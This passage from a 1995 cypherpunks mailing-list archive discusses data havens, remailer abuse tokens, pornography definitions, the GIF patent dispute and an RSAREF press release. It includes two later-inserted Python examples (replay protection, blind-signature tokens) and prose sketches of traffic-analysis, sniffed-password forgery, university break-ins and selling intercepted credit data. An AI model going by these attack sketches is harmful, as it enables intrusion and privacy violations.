juncture.  With an experimental server that wouldn't have the back-up to 
protect itself from attacks in real-space(police feds guns dogs fundies) 
you DO need to be careful.  If you wanna turn this into a profit 
thing(which is possible) you then would get to choose your clients.  I 
guess what I meant to say in that last letter, was directed towards a 
full-fledged, well established and backed DataHaven that was not run for 
profit, but rather as a service to help the public(yeah, I know this 
list's idea on those projects, I won't go that direction no more) and thus 
would need to be open like that.
 
> Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
> it is trivial to use traffic analysis to find where the DH lies.  Just
> monitor traffic from/to the remailer and do a series of store/retrieves.
> Then for confirmation, forge a mail from the dh site to the remailer with
> the password (obtained from sniffing) to yourself.
>
Well for an experiment that is fine, and I don't see it then much more 
than a listserv file service with encryption, unless i am missing 
something in the DataHaven you have planned.  But later on when you wanna 
get serious and shit, you could get better shielding than that, depending 
on how much money you wanna spend.  Everything from offshore sites with 
satellite feeds or radio feeds(encrypted of course) with physical security 
measures and such.
 
> This is the main reason I haven't worked on this code for so long, as
> well as finals and other distractions.  Until I find a decent solution
> to this problem (The alpha test will be a snap... just allow certain
> people to send/get and ban all others, but once in full working mode
> this ceases to be a solution.) I am hesitant on setting up a working
> DH.
> 
I would set one up if I had the code that met my standards(I don't have 
time right now to write it myself, but maybe if this thread goes well i 
will be inspired enough to order a few pizzas and go for it).  Right now 
my connection is much much too slow to allow such traffic.  This is 
something i have been doing some serious thinking about also.  I can 
actually see it being possible for me to have a small scale experimental 
data haven up and running in the near future, acting not only as a drop 
box, but also as a storage place and database of obscure information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 19:13:27 PST
To: root <root@einstein.ssz.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100141.TAA00216@einstein.ssz.com>
Message-ID: <Pine.3.89.9501092103.D8850-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, root wrote:

> 
> From: ravage@bga.com
>   To: cpunks the world over
> 
> Hi all,
> 
> I am very interested in the data haven issue now that I have my site up. The
> aspect of pornography is a problem that has to be faced. To this end, I would
> like to ask that we look at how pornography is defined.

What you define as pornography doesn't mean shit, it's what the media and 
journalists and fundies etc.. decide is pornographic that you gotta watch 
out for.  This means just about anything that isn't vanilla After School 
Special material is suspect.  

I too may have a site in the near future, so I am interested in the 
project also, as I have always been really into the idea of data-havens. 
I think that a self-sufficient data-haven is going to need a lot of 
resources tho to continue its operation past the point where it is known 
to exist.

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raul Deluth Miller <rockwell@nova.umd.edu>
Date: Mon, 9 Jan 95 18:25:54 PST
To: cypherpunks@toad.com
Subject: data havens
Message-ID: <199501100225.VAA08907@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


The problem with encryption, in general, is that it's an attempt to
hide information -- unless the information is trivial, encryption is
only a temporary measure.

Believe it or not, the government (or, more properly, people
associated with the government) is still trying to figure out which
industries are Iraqi owned -- one technique being brought to bear is
statistical analysis of company activities, with special attention to
changes which occurred during the gulf war.

The only way to have data havens be acceptable to the U.S. government
would be to have them become acceptable to the U.S. population (or
some significant fraction of them).  This would imply phasing out the
DEA and the IRS, at a minimum.  [Newspaper article this weekend: how
it's so horrible that some people deal in cash and thus are evading
the IRS.]

More generally, the way to keep a data haven from being located is to
make sure it doesn't have a location...  This is hard to do without
severely impacting latency.

-- 
Raul D. Miller          N=:((*/pq)&|)@                 NB. public e, y, n=:*/pq
<rockwell@nova.umd.edu> P=:*N/@:#               NB. */-.,e e.&factors t=:*/<:pq
                        1=t|e*d    NB. (,-:<:)pq is four large primes, e medium
x-:d P,:y=:e P,:x                  NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Mon, 9 Jan 95 19:30:14 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: Data Haven problems
Message-ID: <9501100322.AB12220@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 PM 1/9/95, dfloyd@io.com wrote:
> ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
>it is trivial to use traffic analysis to find where the DH lies.  Just
>monitor traffic from/to the remailer and do a series of store/retrieves.
>Then for confirmation, forge a mail from the dh site to the remailer with
>the password (obtained from sniffing) to yourself. ...

Hmm, hmm.  Using c'punk remailers with encrypted send blocks fixes one 
problem, especially if the c'punk mailers do some sort of file splitting and 
reassembly along the lines of what happens to IP packets that are too large 
for a given link.  What would also help would be a mechanism for randomly 
varying the encrypted send-to block.  The password replay attacks can be 
fixed by encrypting the transmitted password along with a timestamp/sequence 
number.

One problem that remains would be a trail left by the increased traffic 
to/from a DH vs a normal user.  That could only be fixed by a multitude of 
DH sites.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com
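
Added example, not part of the original message: a minimal sketch of the timestamp/sequence-number fix for the password replay described above. It swaps in an HMAC keyed with the shared password in place of encrypting the password, so the password itself never crosses the wire; the request layout, the `HavenServer` name and the 300-second window are assumptions.

```python
import hashlib
import hmac
import struct

MAX_SKEW = 300   # assumed acceptance window for the timestamp, in seconds
HEADER_LEN = 16  # 8-byte sequence number + 8-byte timestamp
TAG_LEN = 32     # HMAC-SHA256 output


def make_request(password: bytes, seq: int, now: int, command: bytes) -> bytes:
    """Client side: bind the command to a sequence number and a timestamp."""
    header = struct.pack(">QQ", seq, now)
    tag = hmac.new(password, header + command, hashlib.sha256).digest()
    return header + tag + command


class HavenServer:
    """Server side: accept a request once, and only while it is fresh."""

    def __init__(self, password: bytes):
        self.password = password
        self.last_seq = 0  # highest sequence number accepted so far

    def accept(self, request: bytes, now: int):
        if len(request) < HEADER_LEN + TAG_LEN:
            return None
        header = request[:HEADER_LEN]
        tag = request[HEADER_LEN:HEADER_LEN + TAG_LEN]
        command = request[HEADER_LEN + TAG_LEN:]

        # 1. Authenticity: only a holder of the password can produce the tag.
        expected = hmac.new(self.password, header + command,
                            hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return None

        seq, sent_at = struct.unpack(">QQ", header)
        # 2. Freshness: a capture held back for later use goes stale.
        if abs(now - sent_at) > MAX_SKEW:
            return None
        # 3. Uniqueness: a sniffed request cannot be accepted a second time.
        if seq <= self.last_seq:
            return None

        self.last_seq = seq
        return command


if __name__ == "__main__":
    pw = b"constructed-shared-secret"  # constructed sample value
    server = HavenServer(pw)
    req = make_request(pw, 1, 1000, b"RETRIEVE file42")
    print(server.accept(req, now=1010))  # accepted
    print(server.accept(req, now=1020))  # replayed copy is rejected
```
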





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 9 Jan 95 20:36:44 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: Pornography, What is it?
In-Reply-To: <Pine.3.89.9501092103.D8850-0100000@nesta.pr.mcs.net>
Message-ID: <199501100432.WAA00738@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> > 
> > I am very interested in the data haven issue now that I have my site up. The
> > aspect of pornography is a problem that has to be faced. To this end, I would
> > like to ask that we look at how pornography is defined.
> 
> What you define as pornography doesn't mean shit, it's what the media and 
> journalists and fundies etc.. decide is pornographic that you gotta watch 
> out for.  This means just about anything that isn't vanilla After School 
> Special material is suspect.  
>
I am well aware that what I personally consider pornography carries little
weight. But it does carry some since I do vote. There is the whole issue of
community standard that has been left out of this discussion so far and that
means that I as a taxed land owner (5 acres in Lockhard, TX) get to sit on
juries now and again. In that sense what I believe can carry a lot of weight.
Even to the point of refusing to convict somebody because I personally feel a
law or precedence is incorrect. But when you consider states like Oregon where
the whole concept of pornography has been removed from the books it makes me
have a little hope for sanity. My personal contention is that pornography
does not exist any more than good or evil do, these concepts are based on our
personal ethos not anything absolute.
 
> I too may have a site in the near future, so I am interested in the 
> project also, as I have always been really into the idea of data-havens. 
> I think that a self-sufficient data-haven is going to need a lot of 
> resources tho to continue its operation past the point where it is known 
> to exist.
> 
As to data havens being dangerous to run...I don't know. At the recent HoHoCon
there was a long discussion 'bout networks hidden within networks that was very
intriguing. If Doug Barnes is reading this he may be willing to reiterate some
of the talk. I do know that at the moment my partners and myself are looking
at remailer software running under Linux and data havens are something that we
have discussed. I personally see data havens as a repository for information 
that is beyond the keen of governments to regulate. This is the key point to
me. Not whether it is industrial secrets, military secrets, or .gif's that 
jr. can get his rocks off over. I see the whole pornography issue as a red
herring that keeps the dim-witted and ignorant busy on while everyone else
with a clue gets on with their own personal agenda. I do not mean this to imply
a conspiracy, simply that most DA's have something they want (ie political 
clout) and they will in general do whatever it takes to get. In a sense one
could consider such regulatory agencies as mercenaries for personal gain.


> i want to know everything          http://www.mcs.com/~nesta/home.html
> i want to be everywhere                     Nesta's Home Page        
> i want to fuck everyone in the world               &
> i want to do something that matters         /-/ a s t e zine
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Jan 95 23:02:20 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
Message-ID: <199501100701.XAA15283@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Pierre Uszynski <pierre@shell.portal.com>
> Finally, I do not believe that introducing payment in the remailer
> system would curb abuse in any significant way. Significant abuse is
> that which causes significant problems for the operators: posting
> secret religious technology, forging prime minister mail, harassing a
> member of any number of opposite persuasions, etc... Do you think for a
> minute that a 5 cents postage is going to stop these messages now? And
> how about when remailers do attain good reliability and untraceability,
> for 3 cents?

I had suggested an idea a while back where you would try to address the
abuse issue directly rather than charging per message.  I agree with
Pierre that any reasonable per-message charge will not help in many forms
of abuse, although it should address the worst spam attacks.

The idea is to have a sort of digital cash token, but it is free.  The
key is that each person just gets one of these, but they are reusable.
After a remailer sends a message, it waits and sees if it gets any
complaints.  If not, the token is re-blinded and made available to the
original user via some kind of pool.  He can then send another message.
But if he commits abuse, he doesn't get his token back.

Obviously there are problems with this, the worst probably being how we
can keep people from acquiring lots of tokens under different names.
Perhaps you could charge some small amount for them, but require VISA
payment, and check the names on the VISA cards.  (This doesn't hurt
anonymity when the tokens are actually used because of the blinding.)  To
get multiple tokens a person would have to commit some serious real world
name trickery, a considerably higher barrier than making up a pseudonym
on the net.

Another problem is that as stated above, you could only send one
anonymous message every day or two.  Perhaps we relax the rules and let
people have a few of these tokens; they can then abuse the system a few
times but each time they lose a token.

A similar idea might work for the data haven problem, although I don't
understand exactly what is intended there.  This approach is a variation on
the "is a person" credential, which attempts to make sure that each
person only gets one of something.  A lot of situations would benefit
from such a credential, although some people don't like them.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxIw2RnMLJtOy9MBAQGWCgH6A1SFyzZDDhd/NVrMck5SAf3mS4IOl5On
aJNFKUopZi4Fb7tqQfbFukDl/lF+clnBDBNh/yXAsFcABJaWaTUzZA==
=pLOT
-----END PGP SIGNATURE-----
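
Added example, not part of the original message: a toy model of the reusable blinded token described above, using textbook RSA blind signatures. The key (built from two Mersenne primes, insecure and for illustration only), the class names, and the choice to have the user submit a blinded replacement token with each message are assumptions; the identity check at first issue is out of scope.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key from two known Mersenne primes. Constructed for this demo and
# NOT secure; a real issuer would use a properly generated key and padding.
P, Q = 2**89 - 1, 2**127 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # issuer's private exponent


def digest(serial: bytes) -> int:
    """Map a token serial into Z_N (stand-in for a full-domain hash)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class User:
    """Holds one pending token at a time (enough for this walk-through)."""

    def blind_new_token(self) -> int:
        """Pick a fresh random serial and return it blinded for signing."""
        self.serial = secrets.token_bytes(16)
        while True:
            self.r = secrets.randbelow(N - 2) + 2
            if gcd(self.r, N) == 1:
                break
        return digest(self.serial) * pow(self.r, E, N) % N

    def unblind(self, blind_sig: int):
        """Strip the blinding factor, giving a spendable (serial, signature)."""
        return self.serial, blind_sig * pow(self.r, -1, N) % N


class Remailer:
    def __init__(self):
        self.spent = set()  # serials already used, to stop double spending
        self.pending = {}   # msg_id -> blinded replacement awaiting the window
        self.pool = {}      # blinded replacement -> blind signature (public)

    def issue(self, blinded: int) -> int:
        """First issue, assumed to follow a real-world identity check."""
        return pow(blinded, D, N)

    def send(self, msg_id: str, serial: bytes, sig: int, replacement: int) -> bool:
        """Accept a message only with a valid, unspent token."""
        if pow(sig, E, N) != digest(serial) or serial in self.spent:
            return False
        self.spent.add(serial)
        self.pending[msg_id] = replacement
        return True

    def close_window(self, msg_id: str, complaint: bool) -> bool:
        """After the complaint window: return the token only if no abuse."""
        blinded = self.pending.pop(msg_id)
        if complaint:
            return False  # replacement is never signed; the token is lost
        self.pool[blinded] = pow(blinded, D, N)
        return True


if __name__ == "__main__":
    remailer, user = Remailer(), User()
    token = user.unblind(remailer.issue(user.blind_new_token()))
    nxt = user.blind_new_token()
    print("sent:", remailer.send("m1", *token, nxt))
    print("token returned:", remailer.close_window("m1", complaint=False))
```

Because the remailer signs only blinded values, the serial it sees when a token is spent cannot be matched to the signing request it came from, either at first issue or at reissue.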




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 21:07:46 PST
To: root <root@einstein.ssz.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100432.WAA00738@einstein.ssz.com>
Message-ID: <Pine.3.89.9501092201.A9794-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, root wrote:

> As to data havens being dangerous to run...I don't know. At the recent HoHoCon
> there was a long discussion 'bout networks hidden within networks that was very
> intriguing. If Doug Barnes is reading this he may be willing to reiterate some
> of the talk. I do know that at the moment my partners and myself are looking
> at remailer software running under Linux and data havens are something that we
> have discussed. I personally see data havens as a repository for information 
> that is beyond the keen of governments to regulate. This is the key point to
> me. Not whether it is industrial secrets, military secrets, or .gif's that 
> jr. can get his rocks off over. 

This is something I have been doing some writing on lately, the idea of 
nets on top of nets, the almost fractal nature of networking of this 
scale and horizontal nature on the Internet.  A DataHaven, like I 
mentioned in another post, is a vague name, it could be some hacker kid 
with a lot of space on his HD and a fast modem who hacks the local 
university and installs term, rigging his term connection to allow FTP 
connections, or telnet connections, or it could be someone with a decent 
sized investor backing him up as he gets a site linked to the net from 
some Caribbean Island, who collects and intercepts TRW and Equifax like 
data on credit transactions and shit like that, selling it to those about 
to invest in someone or something and want more info on it.  OR maybe 
it's an elaborate set-up of mail aliases thru remailer chains and 
clearing stations that lead to data safe deposit boxes, where someone can 
leave a large amount of data anon, and then allow someone else to 
retrieve it anon also.  With sufficient planning, coding and equipment a 
datahaven could perform almost all the ideas that Tim came up with in his 
cyphernomicon, from selling credit info, to a data drop box, to a holding 
agent for anon transactions(can't remember proper term).

damn I wish I could have made it to HoHoCon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raul Deluth Miller <rockwell@nova.umd.edu>
Date: Mon, 9 Jan 95 20:07:07 PST
To: cypherpunks@toad.com
Subject: Re: Pornography, What is it?
Message-ID: <199501100406.XAA14238@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pornography is in the eyes of the beholder.

[Especially if the beholder happens to be a postmaster in Memphis...]

-- 
Raul D. Miller          N=:((*/pq)&|)@                 NB. public e, y, n=:*/pq
<rockwell@nova.umd.edu> P=:*N/@:#               NB. */-.,e e.&factors t=:*/<:pq
                        1=t|e*d    NB. prim=:1&=@| 2&^@<: [. large=:>&(2^1024)
x-:d P,:y=:e P,:x                  NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dean Anderson <dean@hi.com>
Date: Thu, 12 Jan 95 14:12:56 PST
To: lpf-all-members@albert.gnu.ai.mit.edu
Subject: LPF Statement on the GIF controversy
Message-ID: <9501092348.AA28210@loki.hi.com>
MIME-Version: 1.0
Content-Type: text/plain


      [ Please repost this wherever you think is appropriate! ]

Until now, most computer professionals and companies have ignored the
problem of software patents.  The GIF format for graphical images was
adopted widely on the net, despite the Unisys patent covering the LZW
data compression algorithm.  The patent dates to 1985, but its
enforcement has been carried out with private threats; most victims
are afraid to talk about it.  Now the patent has shown its teeth.

For a few days, the Internet community was shaking with anger at the
surprise demand to pay license fees for the use of GIF format.

It turns out that the license being offered today is only for
Compuserve users.  Compuserve accepted an offer from Unisys that they
couldn't refuse.  Compuserve users can accept this offer now, or face
Unisys later on their own.  The rest of us don't have a choice--we get
to face Unisys when they decide it's our turn.  So much trouble from
just one software patent.

There are now over ten thousand software patents in the US, and
several thousand more are issued each year.  Each one may be owned by,
or could be bought by, a grasping company whose lawyers carefully plan
to attack people at their most vulnerable moments.  Of course, they
couch the threat as a "reasonable offer" to save you miserable years
in court.  "Divide and conquer" is the watchword: pursue one group at
a time, while advising the rest of us to relax because we are in no
danger today.

Software patents may not seem like an urgent problem until you find
one aimed at you.  We all have other fires to fight, and most
developers have hoped that the patents would never blaze up.

In an ironic way, Unisys has done us a favor--by showing that the
problem is too serious to ignore.  What people first feared, could
just as well have happened.  Each of the thousands of software patents
has the potential to devastate a segment of the community, both
software developers and users.  There will be more nasty surprises.
They are part of a system.

Unisys has given us a chance to work together to change the
system--rather than waiting to be sued one by one for this patent or
that.  We can win the fight against software patents, if we speak loud
and clear against them.


What can people do?


* Express your disapproval to Unisys by writing a letter to its CEO.
Tell him what you think of his company's actions:

    James Unruh
    CEO
    UNISYS Corp.
    PO Box 500
    Blue Bell, PA 19424
    fax: 215-986-6850

Please use snail mail--a physical pile of letters is more impressive,
psychologically, than a big file of email.  Keep it short--ten lines
is enough.  Don't spend hours composing your letter; there's no need.
But do write it in your own words, because sending a form letter
written by someone else is not impressive.

Make it clear that the usual excuses--"We're just exercising our
property rights; look how reasonable we are being (compared to what we
_could_ have done)"--won't wash with you.

Avoid saying anything nasty that would give Unisys a chance to paint
itself as the victim.  Cold condemnation is more powerful than flames.

Please email a copy of your letter to the League for Programming
Freedom at gif-letters@lpf.org.  We might ask you for permission
to publish your letter.

* Don't sign a license--stop using GIF.  The World Wide Web consortium
at MIT will probably be coordinating the move away from GIF, and
offering advice and assistance.

   See `http://www.w3.org/'.

* Join the League for Programming Freedom.  The League is a
membership-based organization whose aim is to bring back the freedom
to write software.  The League says that no one should be able to
dictate what kinds of programs you can write.

You can contact the LPF by email to lpf@uunet.uu.net,
or look at its Web pages at `http://www.lpf.org/'.


** Note: the recent license demand came in the name of Compuserve; but
the impetus for it came from Unisys.

Compuserve developed the GIF format many years ago, not knowing there
was a patent on LZW.  (Most programmers have no idea what patents
their programs are vulnerable to--there are too many patents to keep
track of.)  When Unisys threatened to sue them, Compuserve had to give
in to Unisys's demands.  Compuserve arranged to be allowed to offer
Compuserve users a sublicense, but the "offer" was formulated in a way
that was tantamount to an ultimatum.

Compuserve may bear responsibility for some of the details of how this
was handled, but the main responsibility falls on Unisys.  It is
Unisys that claims the power to dictate what kinds of software you can
write.  Unisys decided to use the power for aggression; Unisys forced
Compuserve to participate.



=++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++=
Dean Anderson                                               Dean@hi.com
President
League for Programming Freedom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dean Anderson <dean@hi.com>
Date: Thu, 12 Jan 95 17:24:56 PST
To: lpf-all-members@albert.gnu.ai.mit.edu
Subject: /n@Nd0/ LPF Statement on the GIF controversy
Message-ID: <9501092348.AA28210@loki.hi.com.nando>
MIME-Version: 1.0
Content-Type: text/plain


      [ Please repost this wherever you think is appropriate! ]

Until now, most computer professionals and companies have ignored the
problem of software patents.  The GIF format for graphical images was
adopted widely on the net, despite the Unisys patent covering the LZW
data compression algorithm.  The patent dates to 1985, but its
enforcement has been carried out with private threats; most victims
are afraid to talk about it.  Now the patent has shown its teeth.

For a few days, the Internet community was shaking with anger at the
surprise demand to pay license fees for the use of GIF format.

It turns out that the license being offered today is only for
Compuserve users.  Compuserve accepted an offer from Unisys that they
couldn't refuse.  Compuserve users can accept this offer now, or face
Unisys later on their own.  The rest of us don't have a choice--we get
to face Unisys when they decide it's our turn.  So much trouble from
just one software patent.

There are now over ten thousand software patents in the US, and
several thousand more are issued each year.  Each one may be owned by,
or could be bought by, a grasping company whose lawyers carefully plan
to attack people at their most vulnerable moments.  Of course, they
couch the threat as a "reasonable offer" to save you miserable years
in court.  "Divide and conquer" is the watchword: pursue one group at
a time, while advising the rest of us to relax because we are in no
danger today.

Software patents may not seem like an urgent problem until you find
one aimed at you.  We all have other fires to fight, and most
developers have hoped that the patents would never blaze up.

In an ironic way, Unisys has done us a favor--by showing that the
problem is too serious to ignore.  What people first feared, could
just as well have happened.  Each of the thousands of software patents
has the potential to devastate a segment of the community, both
software developers and users.  There will be more nasty surprises.
They are part of a system.

Unisys has given us a chance to work together to change the
system--rather than waiting to be sued one by one for this patent or
that.  We can win the fight against software patents, if we speak loud
and clear against them.


What can people do?


* Express your disapproval to Unisys by writing a letter to its CEO.
Tell him what you think of his company's actions:

    James Unruh
    CEO
    UNISYS Corp.
    PO Box 500
    Blue Bell, PA 19424
    fax: 215-986-6850

Please use snail mail--a physical pile of letters is more impressive,
psychologically, than a big file of email.  Keep it short--ten lines
is enough.  Don't spend hours composing your letter; there's no need.
But do write it in your own words, because sending a form letter
written by someone else is not impressive.

Make it clear that the usual excuses--"We're just exercising our
property rights; look how reasonable we are being (compared to what we
_could_ have done)"--won't wash with you.

Avoid saying anything nasty that would give Unisys a chance to paint
itself as the victim.  Cold condemnation is more powerful than flames.

Please email a copy of your letter to the League for Programming
Freedom at gif-letters@lpf.org.  We might ask you for permission
to publish your letter.

* Don't sign a license--stop using GIF.  The World Wide Web consortium
at MIT will probably be coordinating the move away from GIF, and
offering advice and assistance.

   See `http://www.w3.org/'.

* Join the League for Programming Freedom.  The League is a
membership-based organization whose aim is to bring back the freedom
to write software.  The League says that no one should be able to
dictate what kinds of programs you can write.

You can contact the LPF by email to lpf@uunet.uu.net,
or look at its Web pages at `http://www.lpf.org/'.


** Note: the recent license demand came in the name of Compuserve; but
the impetus for it came from Unisys.

Compuserve developed the GIF format many years ago, not knowing there
was a patent on LZW.  (Most programmers have no idea what patents
their programs are vulnerable to--there are too many patents to keep
track of.)  When Unisys threatened to sue them, Compuserve had to give
in to Unisys's demands.  Compuserve arranged to be allowed to offer
Compuserve users a sublicense, but the "offer" was formulated in a way
that was tantamount to an ultimatum.

Compuserve may bear responsibility for some of the details of how this
was handled, but the main responsibility falls on Unisys.  It is
Unisys that claims the power to dictate what kinds of software you can
write.  Unisys decided to use the power for aggression; Unisys forced
Compuserve to participate.



=++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++=
Dean Anderson                                               Dean@hi.com
President
League for Programming Freedom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Tue, 10 Jan 95 00:16:36 PST
To: cypherpunks@toad.com
Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF (long)
Message-ID: <v02110103ab37f1277f38@[198.68.251.11]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PRIVACY-ENHANCED MESSAGE-----
Proc-Type: 4,MIC-CLEAR
Content-Domain: RFC822

Date: Mon, 09 Jan 1995 09:00:00 -0800
Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF
From: Christopher Allen <ChristopherA@consensus.com>
Organization: Consensus Development Corporation, San Francisco, CA USA
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Text-Source: ftp://ftp.consensus.com/pub/consensus/pr/RSAREF-PR.txt
X-HTML-Source: http://www.consensus.com:8300/RSAREF-PR.html
Summary: RSA announces that it is licensing commercial distribution
  rights of its RSAREF software to Consensus Development, allowing
  for implementation of commercial Privacy Enhanced Mail (PEM)
  applications.
Keywords: press release, consensus development corporation, rsa data
  security, rsaref, commercial license, support, marketing, maintenance,
  encryption, digital signature, source code, tool kit, PEM, privacy
  enhanced mail


RSA Licenses Commercial Distribution Rights to RSAREF
=====================================================
  RSA announces that it is licensing commercial distribution
  rights of its RSAREF software to Consensus Development, allowing
  for implementation of commercial Privacy Enhanced Mail (PEM)
  applications.


Press Release
-------------
  REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security,
  Inc. and Consensus Development Corporation jointly announce today
  at the RSA Data Security Conference that Consensus Development is
  licensing the commercial distribution rights of RSAREF from RSA
  Data Security.

  RSAREF (pronounced "R.S.A. reff") is short for "RSA reference
  implementation" and is a cryptography source code toolkit designed
  to allow developers to create PEM (Privacy-Enhanced Mail) software
  and other encryption/authentication tools. Until now, RSAREF has
  been an unsupported RSA product approved for use only as part of
  freeware and not-for-profit software applications.

  Consensus Development will now be able to market and license RSAREF
  to commercial software developers, and provide software support and
  future enhancements to the RSAREF source code library.

  This announcement is significant because it is the first program of
  its kind to make the RSAREF implementation of RSA's popular
  patented authentication technology available to commercial vendors.

  "Data mailed, posted, or put on servers on the Internet is
  inherently untrustable today," said Jim Bidzos, president of RSA.
  "Tampering with electronic documents takes no special skills, and
  leaves no trace. With the availability of RSAREF for both free
  software as well as commercial software there is no need for this
  situation to continue."

  Now that a commercial license to RSAREF is available, applications
  may now be developed and sold that incorporate Privacy-Enhanced
  Mail's authentication and encryption capabilities. Christopher
  Allen, President of Consensus Development adds "The PEM standards
  have been under development for a couple of years and only now are
  coming to fruition. The ability to offer both freeware developers
  and commercial software vendors a license to RSAREF will kickstart
  the adoption of PEM-capable mail software."

  Consensus Development will be creating an email discussion list for
  software developers interested in RSAREF. To join the discussion,
  send a message to <listproc@consensus.com> with the body of the
  message requesting "subscribe RSAREF-DEV-L firstname lastname".


Background
----------
  The RSA cryptosystem was invented and patented in the late 1970's
  by Drs. Rivest, Shamir, and Adleman, at the Massachusetts Institute
  of Technology, who started RSA Data Security in Redwood City,
  California, in 1982. Digital signatures are produced using the RSA
  Cryptosystem, which is a public-key cryptosystem. Each user has two
  keys - one public and one private. The public key can be disclosed
  without compromising the private key. Electronic documents can be
  "signed" with an unforgeable signature by using a
  document/private-key combination to produce a signature unique to
  the author and particular document. Anyone using an application
  that supports RSAREF and has the public key of the author can
  subsequently verify the authenticity of the document.

  Applications of digital signatures are endless: expense reports,
  electronic forms and purchase orders, contract revisions,
  engineering change orders, even tax returns can be electronically
  signed to speed electronic document flow and eliminate fraud.
  Furthermore, digital signatures can also be used to detect any
  virus before a program is executed, since any change whatsoever is
  detected. One reason that the paperless office has never
  materialized is that paper must still be printed so that
  handwritten signatures can be applied. RSAREF eliminates that
  necessity. Applications supporting RSAREF could have prevented last
  year's computer fraud at Dartmouth College, in which students were
  tricked into missing an important midterm by a fraudulent
  electronic mail message claiming to be from university faculty.


Corporate Profiles
------------------
  RSA Data Security, Inc. <URL=http://www.rsa.com/> is the
  acknowledged world leader in encryption technology, with over three
  million copies of its software encryption and authentication
  installed and in use worldwide. RSA is a de facto standard for
  encryption and digital signatures, and is part of existing and
  proposed standards for the Internet, CCITT, ISO, ANSI, IEEE and
  business and financial networks around the globe. RSA develops and
  markets platform-independent software developers' kits, end-user
  products, and provides comprehensive consulting services in the
  cryptographic sciences. RSA technology has been embedded in the
  products of many companies, including Microsoft, IBM, Apple,
  Oracle, General Magic, DEC, Sun, Novell, Lotus, Motorola, Northern
  Telecom, AT&T, WordPerfect, General Electric, Hughes Aircraft, and
  many others. The company is headquartered in Redwood City,
  California.

  Consensus Development Corporation <URL=http://www.consensus.com:8300/>
  is a software development and consulting firm specializing in the
  support of organizations that need long-distance collaboration via
  wide-area networks and the Internet. Consensus Development has been
  offering consulting and software tools in the area of collaboration
  support since 1988 and is based in San Francisco, California.
  Clients include Aladdin Systems, American Information Exchange
  (AMIX), America Online, Apple Computer, Attain, Authorware,
  Berrett-Koehler Publishers, Claris Corporation, Component
  Integration Laboratories, Connectix Corporation, Digicash bv, Group
  Technologies, InterCon, ON Technology, Portfolio Systems, RSA Data
  Security, Ronin Publishing, Software Ventures, Visa International,
  and Xanadu Operating Company.

Contact
-------
  Kurt Stammberger
  RSA Data Security, Inc.
  415/595-8782
  <kurt@rsa.com>

  Christopher Allen
  Consensus Development Corporation
  415/647-6383
  <ChristopherA@consensus.com>

$$

------------------------------------------------------------------------
...Christopher Allen                  Consensus Development Corporation..
...<ChristopherA@consensus.com>                   4104-24th Street #419..
...                                        San Francisco, CA 94114-3615..
...                                        o415/647-6383  f415/647-6384..
...Mosaic/WWW Home Page:                                               ..
...Consensus Home Page    ..
-----END PRIVACY-ENHANCED MESSAGE-----
Created with RIPEM Mac 0.8.5 b1






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Mon, 9 Jan 95 18:45:28 PST
To: cypherpunks@toad.com
Subject: Privacy markets
Message-ID: <gate.qX7oyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


mkj@october.ducktown.org wrote:
